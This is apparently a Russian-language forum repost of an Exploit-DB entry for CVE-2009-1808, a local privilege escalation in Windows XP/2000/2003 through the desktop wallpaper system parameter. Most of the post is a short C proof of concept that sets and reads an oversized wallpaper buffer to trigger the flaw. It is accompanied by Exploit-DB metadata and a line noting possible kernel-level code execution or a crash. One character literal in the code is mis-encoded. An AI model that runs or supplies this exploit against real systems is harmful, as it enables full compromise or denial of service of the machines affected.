Exploit Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
33012
Проверка EDB
  1. Пройдено
Автор
ARKON
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
cve-2009-1808
Дата публикации
2009-02-02
C:
// source: https://www.securityfocus.com/bid/35120/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. 

#include <windows.h>
int main()
{
 WCHAR c[1000] = {0};
 memset(c, �c�, 1000);
 SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

 WCHAR b[1000] = {0};
 SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
 return 0;
}
 
Источник
www.exploit-db.com

Похожие темы